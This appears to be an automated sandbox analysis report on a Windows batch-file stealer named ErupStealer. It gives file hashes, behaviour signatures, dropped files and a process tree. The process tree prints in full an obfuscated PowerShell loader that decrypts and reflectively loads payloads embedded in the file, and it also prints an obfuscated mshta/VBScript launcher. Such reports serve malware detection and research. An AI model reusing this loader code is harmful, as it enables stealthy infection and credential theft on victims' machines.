Resubmissions

21/09/2023, 15:27

230921-svygqaha21 7

21/09/2023, 15:23

230921-ssx36sgh9y 10

21/09/2023, 15:12

230921-sley1sah53 10

21/09/2023, 15:08

230921-sh3wnsgh5v 10

Analysis

  • max time kernel
    26s
  • max time network
    20s
  • platform
    windows10-1703_x64
  • resource
    win10-20230915-en
  • resource tags

    arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21/09/2023, 15:23

General

  • Target

    ErupStealer.bat

  • Size

    14.6MB

  • MD5

    9644bf6130818a23b7820e4441d84d6a

  • SHA1

    654d821a794488acba87a809e8eab889eb9845db

  • SHA256

    050efb70d521f74a42dcd63c703900433b03cf138fcfa1812705c8cb37deb1ea

  • SHA512

    db83473f76f680fa8f93da5bfa71d2b396f4cef44d222e75430a09432c68b67e37c92ca56b7f5d54265cbbb44145df00a11ccf89c498a391af609a2976c6beb9

  • SSDEEP

    49152:VfcOj5SiJ6+FBW/rRNkFa34CG36ICLvbtSAKsASfycGoA+uVteH7ki8KjXtXH8xU:u

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:588
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2ff1e438-5ff3-4a5f-b987-05b6eb494b3b}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4424
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat"
      1⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\system32\net.exe
        net session
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4252
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          3⤵
            PID:392
        • C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat.exe
          "ErupStealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mwWOh($uwovJ){ $lIKee=[System.Security.Cryptography.Aes]::Create(); $lIKee.Mode=[System.Security.Cryptography.CipherMode]::CBC; $lIKee.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $lIKee.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4/MHVPOJNXCgMmApeZ/aW7DfvfpDsQu0DAqCZk9AP30='); $lIKee.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GRBc4aBzawKiY1avi58oMw=='); $epLsM=$lIKee.CreateDecryptor(); $return_var=$epLsM.TransformFinalBlock($uwovJ, 0, $uwovJ.Length); $epLsM.Dispose(); $lIKee.Dispose(); $return_var;}function XhrFJ($uwovJ){ $kffSF=New-Object System.IO.MemoryStream(,$uwovJ); $YpnXE=New-Object System.IO.MemoryStream; $ynBsy=New-Object System.IO.Compression.GZipStream($kffSF, [IO.Compression.CompressionMode]::Decompress); $ynBsy.CopyTo($YpnXE); $ynBsy.Dispose(); $kffSF.Dispose(); $YpnXE.Dispose(); $YpnXE.ToArray();}function btWsM($uwovJ,$rQWkL){ $vcWOa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$uwovJ); $Zagwh=$vcWOa.EntryPoint; $Zagwh.Invoke($null, $rQWkL);}$chsAO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat').Split([Environment]::NewLine);foreach ($YTXXB in $chsAO) { if ($YTXXB.StartsWith('SEROXEN')) { $GBpWW=$YTXXB.Substring(7); break; }}$kYJLl=[string[]]$GBpWW.Split('\');$BbRnn=XhrFJ (mwWOh ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kYJLl[0])));$IqrGF=XhrFJ (mwWOh ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kYJLl[1])));btWsM $IqrGF (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));btWsM $BbRnn (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4112
          • C:\Windows\SysWOW64\dllhost.exe
            C:\Windows\SysWOW64\dllhost.exe /Processid:{df002af6-79f6-48e3-a023-f921f23c46a7}
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4192
      • C:\Windows\$sxr-mshta.exe
        C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ghkpOQAYRIzJOVXtopMV4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
        1⤵
          PID:224

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat.exe

          Filesize

          435KB

          MD5

          f7722b62b4014e0c50adfa9d60cafa1c

          SHA1

          f31c17e0453f27be85730e316840f11522ddec3e

          SHA256

          ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

          SHA512

          7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

        • C:\Users\Admin\AppData\Local\Temp\ErupStealer.bat.exe

          Filesize

          435KB

          MD5

          f7722b62b4014e0c50adfa9d60cafa1c

          SHA1

          f31c17e0453f27be85730e316840f11522ddec3e

          SHA256

          ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

          SHA512

          7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0h4hfnk.ema.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Windows\$sxr-powershell.exe

          Filesize

          435KB

          MD5

          f7722b62b4014e0c50adfa9d60cafa1c

          SHA1

          f31c17e0453f27be85730e316840f11522ddec3e

          SHA256

          ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

          SHA512

          7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

        • memory/4112-42-0x00007FFB7C690000-0x00007FFB7C73E000-memory.dmp

          Filesize

          696KB

        • memory/4112-46-0x00007FFB7E020000-0x00007FFB7E1FB000-memory.dmp

          Filesize

          1.9MB

        • memory/4112-12-0x000001C0D1FB0000-0x000001C0D1FC0000-memory.dmp

          Filesize

          64KB

        • memory/4112-29-0x000001C0D1FB0000-0x000001C0D1FC0000-memory.dmp

          Filesize

          64KB

        • memory/4112-34-0x00007FFB72500000-0x00007FFB72EEC000-memory.dmp

          Filesize

          9.9MB

        • memory/4112-35-0x000001C0D1FB0000-0x000001C0D1FC0000-memory.dmp

          Filesize

          64KB

        • memory/4112-36-0x000001C0D2220000-0x000001C0D2244000-memory.dmp

          Filesize

          144KB

        • memory/4112-39-0x000001C0D1FB0000-0x000001C0D1FC0000-memory.dmp

          Filesize

          64KB

        • memory/4112-41-0x00007FFB7E020000-0x00007FFB7E1FB000-memory.dmp

          Filesize

          1.9MB

        • memory/4112-43-0x000001C0D1FB0000-0x000001C0D1FC0000-memory.dmp

          Filesize

          64KB

        • memory/4112-13-0x000001C0D1FB0000-0x000001C0D1FC0000-memory.dmp

          Filesize

          64KB

        • memory/4112-44-0x000001C080290000-0x000001C080EA8000-memory.dmp

          Filesize

          12.1MB

        • memory/4112-11-0x00007FFB72500000-0x00007FFB72EEC000-memory.dmp

          Filesize

          9.9MB

        • memory/4112-18-0x000001C0D22A0000-0x000001C0D2316000-memory.dmp

          Filesize

          472KB

        • memory/4112-47-0x000001C088FB0000-0x000001C08915E000-memory.dmp

          Filesize

          1.7MB

        • memory/4112-62-0x000001C089160000-0x000001C0892BE000-memory.dmp

          Filesize

          1.4MB

        • memory/4112-63-0x000001C0892C0000-0x000001C089318000-memory.dmp

          Filesize

          352KB

        • memory/4112-64-0x000001C089320000-0x000001C089330000-memory.dmp

          Filesize

          64KB

        • memory/4112-68-0x00007FFB7E020000-0x00007FFB7E1FB000-memory.dmp

          Filesize

          1.9MB

        • memory/4112-10-0x000001C0D20F0000-0x000001C0D2112000-memory.dmp

          Filesize

          136KB

        • memory/4112-83-0x00007FFB7C690000-0x00007FFB7C73E000-memory.dmp

          Filesize

          696KB

        • memory/4112-76-0x00007FFB7E020000-0x00007FFB7E1FB000-memory.dmp

          Filesize

          1.9MB

        • memory/4192-75-0x0000000000400000-0x0000000000406000-memory.dmp

          Filesize

          24KB

        • memory/4192-73-0x0000000000400000-0x0000000000406000-memory.dmp

          Filesize

          24KB

        • memory/4424-72-0x0000000140000000-0x0000000140004000-memory.dmp

          Filesize

          16KB

        • memory/4424-70-0x0000000140000000-0x0000000140004000-memory.dmp

          Filesize

          16KB